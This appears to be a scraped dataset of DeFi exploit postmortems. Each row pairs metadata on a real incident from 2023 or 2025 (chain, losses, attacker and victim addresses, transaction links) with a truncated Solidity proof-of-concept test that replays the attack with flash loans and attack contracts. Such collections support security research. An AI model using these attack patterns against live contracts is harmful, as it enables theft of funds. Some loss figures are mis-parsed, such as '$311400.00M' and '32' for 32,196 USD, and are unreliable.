// Attack Contract : https://bscscan.com/address/0x383794a0c68e5c8c050f8f361b26a2... | exploit_poc | VDS | 2025-07 | VDS_exp.sol | flash_loan | 6f816a4c12ceb88f | 2026-01-07T10:59:16.541730 | postmortems | bsc | null | 13k USD | 13,000 | https://bscscan.com/address/0xa3e18e6028b1ca09433157cd6a5e807ffe705350 | https://bscscan.com/address/0x383794a0c68e5c8c050f8f361b26a22b3f60eccf | https://bscscan.com/address/0x6ce69d7146dbaae18c11c36d8d94428623b29d5a | https://bscscan.com/tx/0x0e01fd8798f970fd689014cb215e622aca8b7c8c243176c5b504e0043402e31f | null | https://x.com/SlowMist_Team/status/1945672192471302645 | true | true | true | medium | 13k USD | flash-loan | function testExploit() public balanceLog {
// Step 1: Flash loan 20k BSC_USD from Moolah
IERC20(BSC_USD).approve(MOOLAH, type(uint256).max);
IMoolah(MOOLAH).flashLoan(BSC_USD, 20_000 ether, "");
} | true | 13k USD | https://bscscan.com/address/0xa3e18e6028b1ca09433157cd6a5e807ffe705350 | https://bscscan.com/address/0x383794a0c68e5c8c050f8f361b26a22b3f60eccf | https://bscscan.com/address/0x6ce69d7146dbaae18c11c36d8d94428623b29d5a | https://bscscan.com/tx/0x0e01fd8798f970fd689014cb215e622aca8b7c8c243176c5b504e0043402e31f | https://x.com/SlowMist_Team/status/1945672192471302645 | $13.0K | 8.58 | high | VDS Exploit (2025-07) | true | true | true | false | |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 730K USD
// Attacker : https://etherscan.io/address/0x5b9b4b4dafbcfceea7afba56958fcbb37d82d4a2
// Attack Contract : https://etherscan.io/address/0x08947cedf35f9669012bda6fda9... | exploit_poc | SuperRare | 2025-07 | SuperRare_exp.sol | null | 058c476f57e17172 | 2026-01-07T10:59:16.541783 | postmortems | ethereum | null | 730K USD | 730,000 | https://etherscan.io/address/0x5b9b4b4dafbcfceea7afba56958fcbb37d82d4a2 | https://etherscan.io/address/0x08947cedf35f9669012bda6fda9d03c399b017ab | https://etherscan.io/address/0xfFB512B9176D527C5D32189c3e310Ed4aB2Bb9eC | https://app.blocksec.com/explorer/tx/eth/0xd813751bfb98a51912b8394b5856ae4515be6a9c6e5583e06b41d9255ba6e3c1 | null | https://x.com/SlowMist_Team/status/1949770231733530682 | true | true | false | high | 730K USD | unknown | function testExploit() public balanceLog {
// deploy attack contract and etch it to ATTACK_CONTRACT address
AttackContract acTemp = new AttackContract();
bytes memory code = address(acTemp).code;
vm.etch(ATTACK_CONTRACT, code);
AttackContract ac = AttackContract(ATTACK_CONTRACT);... | true | 730K USD | https://etherscan.io/address/0x5b9b4b4dafbcfceea7afba56958fcbb37d82d4a2 | https://etherscan.io/address/0x08947cedf35f9669012bda6fda9d03c399b017ab | https://etherscan.io/address/0xfFB512B9176D527C5D32189c3e310Ed4aB2Bb9eC | https://app.blocksec.com/explorer/tx/eth/0xd813751bfb98a51912b8394b5856ae4515be6a9c6e5583e06b41d9255ba6e3c1 | https://x.com/SlowMist_Team/status/1949770231733530682 | $730.0K | 7.62 | medium | SuperRare Exploit (2025-07) | true | true | true | false | |
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 285.7K USD
// Attacker : https://etherscan.io/address/0xb750e3165de458eae09904cc7fad099632860b0f
// Attack Contract : https://etherscan.io/address/0x1a61249f6f4f9813c55aa3b02c69438607272ed3
// Vulnerable Contra... | exploit_poc | unverified_54cd | 2025-07 | unverified_54cd_exp.sol | null | 57486f61c9d67ff8 | 2026-01-07T10:59:16.541834 | postmortems | ethereum | 22,855,568 | 285.7K USD | 285,700 | https://etherscan.io/address/0xb750e3165de458eae09904cc7fad099632860b0f | https://etherscan.io/address/0x1a61249f6f4f9813c55aa3b02c69438607272ed3 | https://etherscan.io/address/0x54cd23460df45559fd5feeaada7ba25f89c13525 | https://app.blocksec.com/explorer/tx/eth/0xa57ec56af91ec70517ca71ca50101958d9c2ec9fdb61edcf35a9081c375725c2 | https://x.com/TenArmorAlert/status/1941689712621576493 | https://x.com/TenArmorAlert/status/1941689712621576493 | true | true | false | high | 285.7K USD | unknown | function testPoC() public {
emit log_named_decimal_uint("before attack: balance of attacker", address(attacker).balance, 18);
vm.startPrank(attacker, attacker);
AttackerC attC = new AttackerC();
attC.attack();
vm.stopPrank();
emit log_named_decimal_uint("after attack: bal... | true | 285.7K USD | https://etherscan.io/address/0xb750e3165de458eae09904cc7fad099632860b0f | https://etherscan.io/address/0x1a61249f6f4f9813c55aa3b02c69438607272ed3 | https://etherscan.io/address/0x54cd23460df45559fd5feeaada7ba25f89c13525 | https://app.blocksec.com/explorer/tx/eth/0xa57ec56af91ec70517ca71ca50101958d9c2ec9fdb61edcf35a9081c375725c2 | https://x.com/TenArmorAlert/status/1941689712621576493 | https://x.com/TenArmorAlert/status/1941689712621576493 | $285.7K | 7.44 | medium | unverified_54cd Exploit (2025-07) | true | true | true | true |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : ~ 311.4 BNB
// Attacker : https://bscscan.com/address/0xad2cb8f48e74065a0b884af9c5a4ecbba101be23
// Attack Contract : https://bscscan.com/address/0x1e2d48e640243b04a9fa76eb49... | exploit_poc | RANTToken | 2025-07 | RANTToken_exp.sol | null | fe315683fb0fefa4 | 2026-01-07T10:59:16.541888 | postmortems | bsc | null | ~ 311.4 BNB | 311,400,000,000 | https://bscscan.com/address/0xad2cb8f48e74065a0b884af9c5a4ecbba101be23 | https://bscscan.com/address/0x1e2d48e640243b04a9fa76eb49080e9ab110b4ac | https://bscscan.com/address/0xc321ac21a07b3d593b269acdace69c3762ca2dd0 | https://bscscan.com/tx/0x2d9c1a00cf3d2fda268d0d11794ad2956774b156355e16441d6edb9a448e5a99 | null | https://x.com/Phalcon_xyz/status/1941788315549946225 | true | true | false | critical | ~ 311.4 BNB | unknown | function testExploit() public balanceLog {
AttackContract attackContract = new AttackContract();
attackContract.start();
}
receive() external payable {
// Handle the received funds
}
}
contract AttackContract {
address attacker;
uint256 borrowAmount = 2_813_769_505_544_453_... | true | ~ 311.4 BNB | https://bscscan.com/address/0xad2cb8f48e74065a0b884af9c5a4ecbba101be23 | https://bscscan.com/address/0x1e2d48e640243b04a9fa76eb49080e9ab110b4ac | https://bscscan.com/address/0xc321ac21a07b3d593b269acdace69c3762ca2dd0 | https://bscscan.com/tx/0x2d9c1a00cf3d2fda268d0d11794ad2956774b156355e16441d6edb9a448e5a99 | https://x.com/Phalcon_xyz/status/1941788315549946225 | $311400.00M | 8.09 | high | RANTToken Exploit (2025-07) | true | true | true | false | |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "forge-std/Test.sol";
// @KeyInfo - Total Lost : 32,196.28 USD
// Attacker : https://etherscan.io/address/0x657a2b6fe37ced2f31fd7513095dbfb126a53601
// Attack Contract : https://etherscan.io/address/0x7f1f536223d6a84ad4897a675f04886ce1c3b7a1
// V... | exploit_poc | SWAPPStaking | 2025-07 | SWAPPStaking_exp.sol | null | ee83ddee943b50ad | 2026-01-07T10:59:16.541970 | postmortems | ethereum | null | 32,196.28 USD | 32 | https://etherscan.io/address/0x657a2b6fe37ced2f31fd7513095dbfb126a53601 | https://etherscan.io/address/0x7f1f536223d6a84ad4897a675f04886ce1c3b7a1 | https://etherscan.io/address/0x245a551ee0f55005e510b239c917fa34b41b3461 | https://app.blocksec.com/explorer/tx/eth/0xa02b159fb438c8f0fb2a8d90bc70d8b2273d06b55920b26f637cab072b7a0e3e | null | https://x.com/deeberiroz/status/1947213692220710950 | true | true | false | low | 32,196.28 USD | unknown | function testExploit() public {
exploit();
} | true | 32,196.28 USD | https://etherscan.io/address/0x657a2b6fe37ced2f31fd7513095dbfb126a53601 | https://etherscan.io/address/0x7f1f536223d6a84ad4897a675f04886ce1c3b7a1 | https://etherscan.io/address/0x245a551ee0f55005e510b239c917fa34b41b3461 | https://app.blocksec.com/explorer/tx/eth/0xa02b159fb438c8f0fb2a8d90bc70d8b2273d06b55920b26f637cab072b7a0e3e | https://x.com/deeberiroz/status/1947213692220710950 | $32 | 9 | high | SWAPPStaking Exploit (2025-07) | true | true | true | false | |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.22;
import "forge-std/Test.sol";
import "../interface.sol";
interface IRewardRouterV2 {
function mintAndStakeGlp(address _token, uint256 _amount, uint256 _minUsdg, uint256 _minGlp) external returns (uint256);
function unstakeAndRedeemGlp(address _tok... | exploit_poc | gmx | 2025-07 | gmx_exp.sol | flash_loan | e5e92db0258766a0 | 2026-01-07T10:59:16.542146 | postmortems | arbitrum | 355,878,385 | null | null | null | null | null | null | null | null | false | false | true | medium | null | flash-loan | function testExploit() public {
console2.log("-------- attack before --------");
console2.log("eth balance of vault = ", weth_.balanceOf(address(vault_)) / 10 ** weth_.decimals());
console2.log("btc balance of vault = ", btc_.balanceOf(address(vault_)) / 10 ** btc_.decimals());
console2.... | true | Unknown | 6 | medium | gmx Exploit (2025-07) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 4.7M USDT
// Attacker : https://bscscan.com/address/0x18dd258631b23777c101440380bf053c79db3d9d
// Attack Contract : https://bscscan.com/address/0xbf6e706d505e81ad1f73bbc0babf... | exploit_poc | FPC | 2025-07 | FPC_exp.sol | null | be98ec1633dfdf0d | 2026-01-07T10:59:16.542285 | postmortems | bsc | null | 4.7M USDT | 4,700,000 | https://bscscan.com/address/0x18dd258631b23777c101440380bf053c79db3d9d | https://bscscan.com/address/0xbf6e706d505e81ad1f73bbc0babfe2b414ba3eb3 | https://bscscan.com/address/0xb192d4a737430aa61cea4ce9bfb6432f7d42592f | https://bscscan.com/tx/0x3a9dd216fb6314c013fa8c4f85bfbbe0ed0a73209f54c57c1aab02ba989f5937 | null | https://x.com/TenArmorAlert/status/1940423393880244327 | true | true | false | critical | 4.7M USDT | unknown | function testExploit() public balanceLog {
// Step 1: borrow 23,020,000 USDT from Pancake Pool
IPancakeV3Pool(PANCAKE_POOL).flash(address(this), 23_020_000 ether, 0, "");
} | true | 4.7M USDT | https://bscscan.com/address/0x18dd258631b23777c101440380bf053c79db3d9d | https://bscscan.com/address/0xbf6e706d505e81ad1f73bbc0babfe2b414ba3eb3 | https://bscscan.com/address/0xb192d4a737430aa61cea4ce9bfb6432f7d42592f | https://bscscan.com/tx/0x3a9dd216fb6314c013fa8c4f85bfbbe0ed0a73209f54c57c1aab02ba989f5937 | https://x.com/TenArmorAlert/status/1940423393880244327 | $4.70M | 7.77 | medium | FPC Exploit (2025-07) | true | true | true | false | |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : ~10 K usdt
// Original Attacker : https://bscscan.com/address/0x726fb298168c89d5dce9a578668ab156c7e7be67
// Attack Contract : https://bscscan.com/address/0x756d614e3d277... | exploit_poc | MulticallWithETH | 2025-07 | MulticallWithETH_exp.sol | null | 2cc992866731ad48 | 2026-01-07T10:59:16.542333 | postmortems | bsc | 55,371,342 | ~10 K usdt | 10,000 | https://bscscan.com/address/0x726fb298168c89d5dce9a578668ab156c7e7be67 | https://bscscan.com/address/0x756d614e3d277baea260f64cc2ab9a3ac89877d3 | https://bscscan.com/address/0x3da0f00d5c4e544924bc7282e18497c4a4c92046 | https://bscscan.com/tx/0x6da7be6edf3176c7c4b15064937ee7148031f92a4b72043ae80a2b3403ab6302 | null | null | true | false | false | medium | ~10 K usdt | unknown | false | ~10 K usdt | https://bscscan.com/address/0x726fb298168c89d5dce9a578668ab156c7e7be67 | https://bscscan.com/address/0x756d614e3d277baea260f64cc2ab9a3ac89877d3 | https://bscscan.com/address/0x3da0f00d5c4e544924bc7282e18497c4a4c92046 | https://bscscan.com/tx/0x6da7be6edf3176c7c4b15064937ee7148031f92a4b72043ae80a2b3403ab6302 | $10.0K | 4.82 | low | MulticallWithETH Exploit (2025-07) | true | true | true | false | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~260K USD$
// Attacker : c0ffeebabe.eth (wihtehat)
// Attack Contract : https://etherscan.io/address/0x3aa228a80f50763045bdfc45012da124bd0a6809 (Mev Contract)
// Vulnera... | exploit_poc | WiseLending | 2023-10 | WiseLending_exp.sol | flash_loan | 6270b302972c318a | 2026-01-07T10:59:16.542380 | postmortems | ethereum | 18,342,120 | ~260K USD$ | 260,000 | null | https://etherscan.io/address/0x3aa228a80f50763045bdfc45012da124bd0a6809 | https://etherscan.io/address/0x84524baa1951247b3a2617a843e6ece915bb9674 | https://etherscan.io/tx/0x7ac4a98599596adbf12fffa2bd23e2a2d2ac7e8989b6ea043fcc412a29126555 | null | https://twitter.com/bbbb/status/1712841315522638034 | true | true | true | high | ~260K USD$ | flash-loan | function testExploit() public {
WBTC.approve(address(WiseLending), type(uint256).max);
address[] memory tokens = new address[](1);
tokens[0] = address(WBTC);
uint256[] memory amounts = new uint256[](1);
amounts[0] = 50 * 1e8;
bytes memory userData = "";
Balancer.... | true | ~260K USD$ | https://etherscan.io/address/0x3aa228a80f50763045bdfc45012da124bd0a6809 | https://etherscan.io/address/0x84524baa1951247b3a2617a843e6ece915bb9674 | https://etherscan.io/tx/0x7ac4a98599596adbf12fffa2bd23e2a2d2ac7e8989b6ea043fcc412a29126555 | https://twitter.com/bbbb/status/1712841315522638034 | $260.0K | 10 | high | WiseLending Exploit (2023-10) | true | true | true | false | ||
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~$825000 US$
// Attacker : https://etherscan.io/address/0xA8Bbb3742f299B183190a9B079f1C0db8924145b
// Attack Contract : https://etherscan.io/address/0xc74b72bbf904bac9fac880303922fc76a69f0bb4
// Vulnerable Contract : https://ethersca... | exploit_poc | Hopelend | 2023-10 | Hopelend_exp.sol | flash_loan | 52ea73428e21e74a | 2026-01-07T10:59:16.542453 | postmortems | ethereum | 18,377,041 | ~$825000 US$ | 825,000 | https://etherscan.io/address/0xA8Bbb3742f299B183190a9B079f1C0db8924145b | https://etherscan.io/address/0xc74b72bbf904bac9fac880303922fc76a69f0bb4 | https://etherscan.io/address/0x53FbcADa1201A465740F2d64eCdF6FAC425f9030 | https://etherscan.io/tx/0x1a7ee0a7efc70ed7429edef069a1dd001fbff378748d91f17ab1876dc6d10392 | null | null | true | true | true | high | ~$825000 US$ | flash-loan | function testAttack() public {
deal(address(this), 0);
approveAll();
address[] memory assets = new address[](1);
assets[0] = address(WBTC);
uint256[] memory amounts = new uint256[](1);
amounts[0] = 2300 * 1e8;
uint256[] memory modes = new uint256[](1);
mo... | true | ~$825000 US$ | https://etherscan.io/address/0xA8Bbb3742f299B183190a9B079f1C0db8924145b | https://etherscan.io/address/0xc74b72bbf904bac9fac880303922fc76a69f0bb4 | https://etherscan.io/address/0x53FbcADa1201A465740F2d64eCdF6FAC425f9030 | https://etherscan.io/tx/0x1a7ee0a7efc70ed7429edef069a1dd001fbff378748d91f17ab1876dc6d10392 | $825.0K | 10 | high | Hopelend Exploit (2023-10) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "./../basetest.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~$14K
// Attacker : https://bscscan.com/address/0x7ccf451d3c48c8bb747f42f29a0cde4209ff863e
// Attack Contract : https://bscscan.com/address/0xa905ff8853edc498a2acddfdfac4... | exploit_poc | ZS | 2023-10 | ZS_exp.sol | null | dafd15a8f88a85eb | 2026-01-07T10:59:16.542541 | postmortems | bsc | null | ~$14K | 14,000 | https://bscscan.com/address/0x7ccf451d3c48c8bb747f42f29a0cde4209ff863e | https://bscscan.com/address/0xa905ff8853edc498a2acddfdfac4a56c2c599930 | https://bscscan.com/address/0x12b3b6b1055b8ad1ae8f60a0b6c79a9825bcb4bc | https://app.blocksec.com/explorer/tx/bsc/0xe2e87090f47c82eed3697297763edfad8e9689d2da7a4325541087d77432f54f | null | https://x.com/MetaSec_xyz/status/1711189697534513327 | true | true | false | medium | ~$14K | unknown | function testExploit() public {
deal(address(this), 0.1 ether);
deal(address(BUSDT), address(this), 0);
// First tx
AttackContract attackContract = new AttackContract{value: address(this).balance}();
vm.roll(block.number + 2);
emit log_named_decimal_uint(
"Exp... | true | ~$14K | https://bscscan.com/address/0x7ccf451d3c48c8bb747f42f29a0cde4209ff863e | https://bscscan.com/address/0xa905ff8853edc498a2acddfdfac4a56c2c599930 | https://bscscan.com/address/0x12b3b6b1055b8ad1ae8f60a0b6c79a9825bcb4bc | https://app.blocksec.com/explorer/tx/bsc/0xe2e87090f47c82eed3697297763edfad8e9689d2da7a4325541087d77432f54f | https://x.com/MetaSec_xyz/status/1711189697534513327 | $14.0K | 9 | high | ZS Exploit (2023-10) | true | true | true | false | |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo -- Total Lost : ~280 ETH
// Attacker : https://etherscan.io/address/0xce6397e53c13ff2903ffe8735e478d31e648a2c6
// Attack Contract : https://etherscan.io/address/0xe6c6e86e04de96c4e3a29... | exploit_poc | MaestroRouter2 | 2023-10 | MaestroRouter2_exp.sol | null | 0454a297573e0e70 | 2026-01-07T10:59:16.542608 | postmortems | ethereum | null | ~280 ETH | 280 | https://etherscan.io/address/0xce6397e53c13ff2903ffe8735e478d31e648a2c6 | https://etherscan.io/address/0xe6c6e86e04de96c4e3a29ad480c94e7a471969ab | null | null | null | null | true | true | false | low | ~280 ETH | unknown | function testExploit() public {
cheats.rollFork(18_423_219);
emit log_named_decimal_uint("Attacker Mog balance before exploit", Mog.balanceOf(address(this)), Mog.decimals());
address[] memory victims = new address[](7);
victims[0] = 0x4189ad9624F838eef865B09a0BE3369EAaCd8f6F;
vi... | true | https://etherscan.io/address/0xce6397e53c13ff2903ffe8735e478d31e648a2c6 | https://etherscan.io/address/0xe6c6e86e04de96c4e3a29ad480c94e7a471969ab | $280 | 6.32 | medium | MaestroRouter2 Exploit (2023-10) | true | false | false | false | |||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~$1.27M
// Attacker : https://bscscan.com/address/0xfdbfceea1de360364084a6f37c9cdb7aaea63464
// Attack Contract : https://bscscan.com/address/0x216ccfd4fb3f2267677598f96... | exploit_poc | BH | 2023-10 | BH_exp.sol | flash_loan | 9bd4449ced55e312 | 2026-01-07T10:59:16.542663 | postmortems | bsc | 32,512,073 | ~$1.27M | 1,270,000 | https://bscscan.com/address/0xfdbfceea1de360364084a6f37c9cdb7aaea63464 | https://bscscan.com/address/0x216ccfd4fb3f2267677598f96ef1ff151576480c | https://bscscan.com/address/0xcc61cc9f2632314c9d452aca79104ddf680952b5 | https://bscscan.com/tx/0xc11e4020c0830bcf84bfa197696d7bfad9ff503166337cb92ea3fade04007662 | null | null | true | true | true | critical | ~$1.27M | flash-loan | function testExploit() public {
deal(address(BUSDT), address(this), 0);
emit log_named_decimal_uint(
"Attacker BUSDT balance before attack", BUSDT.balanceOf(address(this)), BUSDT.decimals()
);
emit log_named_decimal_uint("Attacker BH balance before attack", BH.balanceOf(add... | true | ~$1.27M | https://bscscan.com/address/0xfdbfceea1de360364084a6f37c9cdb7aaea63464 | https://bscscan.com/address/0x216ccfd4fb3f2267677598f96ef1ff151576480c | https://bscscan.com/address/0xcc61cc9f2632314c9d452aca79104ddf680952b5 | https://bscscan.com/tx/0xc11e4020c0830bcf84bfa197696d7bfad9ff503166337cb92ea3fade04007662 | $1.27M | 10 | high | BH Exploit (2023-10) | true | true | true | false | ||
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo -- Total Lost : ~1.8 WBNB
// TX : https://app.blocksec.com/explorer/tx/bsc/0x0d13a61e9dc81cfae324d3d80e49830d9bbae300f760e016a15600889a896a1b
// Attacker : https://bscscan.com/address/0x7cb74265e3e2d2b707122bf45aea66137c6c8... | exploit_poc | LaEeb | 2023-10 | LaEeb_exp.sol | flash_loan | 988a850e0e388df2 | 2026-01-07T10:59:16.542718 | postmortems | bsc | 33,053,187 | ~1.8 WBNB | 1.8 | https://bscscan.com/address/0x7cb74265e3e2d2b707122bf45aea66137c6c8891 | https://bscscan.com/address/0x9180981034364f683ea25bcce0cff5e03a595bef | null | null | null | null | true | false | true | low | ~1.8 WBNB | flash-loan | false | https://bscscan.com/address/0x7cb74265e3e2d2b707122bf45aea66137c6c8891 | https://bscscan.com/address/0x9180981034364f683ea25bcce0cff5e03a595bef | $2 | 4.15 | low | LaEeb Exploit (2023-10) | true | false | false | false | ||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~$13K
// Attacker : https://bscscan.com/address/0xcd03ed98868a6cd78096f116a4b56a5f2c67757d
// Attack Contract : https://bscscan.com/address/0x502b4a51ca7900f391d474268c9... | exploit_poc | MicDao | 2023-10 | MicDao_exp.sol | flash_loan | d58494f2a470081c | 2026-01-07T10:59:16.542759 | postmortems | bsc | 32,711,747 | ~$13K | 13,000 | https://bscscan.com/address/0xcd03ed98868a6cd78096f116a4b56a5f2c67757d | https://bscscan.com/address/0x502b4a51ca7900f391d474268c907b110a277d6f | null | https://bscscan.com/tx/0x24a2fbb27d433d91372525954f0d7d1af7509547b9ada29cc6c078e732c6d075 | null | null | true | true | true | medium | ~$13K | flash-loan | function testExploit() public {
deal(address(BUSDT), address(this), 0);
emit log_named_decimal_uint(
"Attacker BUSDT balance before exploit", BUSDT.balanceOf(address(this)), BUSDT.decimals()
);
DPPOracle.flashLoan(0, (BUSDT.balanceOf(address(DPPOracle)) * 99) / 100, address(... | true | ~$13K | https://bscscan.com/address/0xcd03ed98868a6cd78096f116a4b56a5f2c67757d | https://bscscan.com/address/0x502b4a51ca7900f391d474268c907b110a277d6f | https://bscscan.com/tx/0x24a2fbb27d433d91372525954f0d7d1af7509547b9ada29cc6c078e732c6d075 | $13.0K | 8 | high | MicDao Exploit (2023-10) | true | false | true | false | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~2M USD$
// Attacker : https://snowtrace.io/address/0x0cd4fd0eecd2c5ad24de7f17ae35f9db6ac51ee7
// Attack Contract : https://snowtrace.io/address/0x44e251786a699518d6273e... | exploit_poc | Platypus03 | 2023-10 | Platypus03_exp.sol | flash_loan | 10855520ab1838d8 | 2026-01-07T10:59:16.542808 | postmortems | avalanche | 36,346,397 | ~2M USD$ | 2,000,000 | https://snowtrace.io/address/0x0cd4fd0eecd2c5ad24de7f17ae35f9db6ac51ee7 | https://snowtrace.io/address/0x44e251786a699518d6273ea1e027cec27b49d3bd | https://snowtrace.io/address/0xe5c84c7630a505b6adf69b5594d0ff7fedd5f447 | https://snowtrace.io/tx/0x4425f757715e23d392cda666bc0492d9e5d5848ff89851a1821eab5ed12bb867 | null | https://twitter.com/BlockSecTeam/status/1712445197538468298 | true | true | true | critical | ~2M USD$ | flash-loan | function testExploit() public {
WAVAX.approve(address(PlatypusPool), type(uint256).max);
SAVAX.approve(address(PlatypusPool), type(uint256).max);
address[] memory assets = new address[](2);
assets[0] = address(WAVAX);
assets[1] = address(SAVAX);
uint256[] memory amounts ... | true | ~2M USD$ | https://snowtrace.io/address/0x0cd4fd0eecd2c5ad24de7f17ae35f9db6ac51ee7 | https://snowtrace.io/address/0x44e251786a699518d6273ea1e027cec27b49d3bd | https://snowtrace.io/address/0xe5c84c7630a505b6adf69b5594d0ff7fedd5f447 | https://snowtrace.io/tx/0x4425f757715e23d392cda666bc0492d9e5d5848ff89851a1821eab5ed12bb867 | https://twitter.com/BlockSecTeam/status/1712445197538468298 | $2.00M | 9.39 | high | Platypus03 Exploit (2023-10) | true | true | true | false | |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~1.4 ETH
// Attacker : https://etherscan.io/address/0xea75aec151f968b8de3789ca201a2a3a7faeefba
// Attack Contract : https://etherscan.io/address/0xf88d1d6d9db9a39dbbfc4b... | exploit_poc | pSeudoEth | 2023-10 | pSeudoEth_exp.sol | flash_loan | 7a48627dceb25383 | 2026-01-07T10:59:16.542857 | postmortems | ethereum | 18,305,132 | ~1.4 ETH | 1.4 | https://etherscan.io/address/0xea75aec151f968b8de3789ca201a2a3a7faeefba | https://etherscan.io/address/0xf88d1d6d9db9a39dbbfc4b101cecc495bb0636f8 | https://etherscan.io/address/0x2033b54b6789a963a02bfcbd40a46816770f1161 | https://etherscan.io/tx/0x4ab68b21799828a57ea99c1288036889b39bf85785240576e697ebff524b3930 | null | https://twitter.com/CertiKAlert/status/1710979615164944729 | true | true | true | low | ~1.4 ETH | flash-loan | false | ~1.4 ETH | https://etherscan.io/address/0xea75aec151f968b8de3789ca201a2a3a7faeefba | https://etherscan.io/address/0xf88d1d6d9db9a39dbbfc4b101cecc495bb0636f8 | https://etherscan.io/address/0x2033b54b6789a963a02bfcbd40a46816770f1161 | https://etherscan.io/tx/0x4ab68b21799828a57ea99c1288036889b39bf85785240576e697ebff524b3930 | https://twitter.com/CertiKAlert/status/1710979615164944729 | $1 | 6.61 | medium | pSeudoEth Exploit (2023-10) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~$175K
// Attacker : https://arbiscan.io/address/0x4843e00ef4c9f9f6e6ae8d7b0a787f1c60050b01
// Attack Contract : https://arbiscan.io/address/0x9e8675365366559053f964be58... | exploit_poc | BelugaDex | 2023-10 | BelugaDex_exp.sol | flash_loan | 32c4f2b19d28f271 | 2026-01-07T10:59:16.542906 | postmortems | arbitrum | 140,129,166 | ~$175K | 175,000 | https://arbiscan.io/address/0x4843e00ef4c9f9f6e6ae8d7b0a787f1c60050b01 | https://arbiscan.io/address/0x9e8675365366559053f964be5838d5fca008722c | https://arbiscan.io/address/0x15a024061c151045ba483e9243291dee6ee5fd8a | https://arbiscan.io/tx/0x57c96e320a3b885fabd95dd476d43c0d0fb10500d940d9594d4a458471a87abe | null | null | true | true | true | high | ~$175K | flash-loan | function testExploit() public {
deal(address(this), 0 ether);
USDT.approve(address(SushiRouter), type(uint256).max);
USDCe.approve(address(SushiRouter), type(uint256).max);
address[] memory tokens = new address[](2);
tokens[0] = address(USDT);
tokens[1] = address(USDCe);... | true | ~$175K | https://arbiscan.io/address/0x4843e00ef4c9f9f6e6ae8d7b0a787f1c60050b01 | https://arbiscan.io/address/0x9e8675365366559053f964be5838d5fca008722c | https://arbiscan.io/address/0x15a024061c151045ba483e9243291dee6ee5fd8a | https://arbiscan.io/tx/0x57c96e320a3b885fabd95dd476d43c0d0fb10500d940d9594d4a458471a87abe | $175.0K | 10 | high | BelugaDex Exploit (2023-10) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~$8K
// Attacker : https://bscscan.com/address/0x8ebd046992afe07eacce6b9b3878fdb45830f42b
// Attack Contract : https://bscscan.com/address/0x5366c6ba729d9cf8d472500afc1a... | exploit_poc | OpenLeverage | 2023-10 | OpenLeverage_exp.sol | null | adfc6b6b0df43d03 | 2026-01-07T10:59:16.542977 | postmortems | bsc | 32,820,951 | ~$8K | 8,000 | https://bscscan.com/address/0x8ebd046992afe07eacce6b9b3878fdb45830f42b | https://bscscan.com/address/0x5366c6ba729d9cf8d472500afc1a2976ac2fe9ff | null | https://bscscan.com/tx/0xd88f26f2f9145fa413db0cfd5d3eb121e3a50a3fdcee16c9bd4731e68332ce4b | null | null | true | true | false | low | ~$8K | unknown | function testExploit() public {
deal(address(this), 0 ether);
emit log_named_decimal_uint("Attacker BNB balance before exploit", address(this).balance, 18);
assertEq(openLeverageDeployer, RewardVaultDelegator.admin());
emit log_named_address("Original admin address (Open Leverage Deploy... | true | ~$8K | https://bscscan.com/address/0x8ebd046992afe07eacce6b9b3878fdb45830f42b | https://bscscan.com/address/0x5366c6ba729d9cf8d472500afc1a2976ac2fe9ff | https://bscscan.com/tx/0xd88f26f2f9145fa413db0cfd5d3eb121e3a50a3fdcee16c9bd4731e68332ce4b | $8.0K | 7.73 | medium | OpenLeverage Exploit (2023-10) | true | false | true | false | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~3M$
// Attacker : https://snowtrace.io/address/0xa2ebf3fcd757e9be1e58b643b6b5077d11b4ad7a
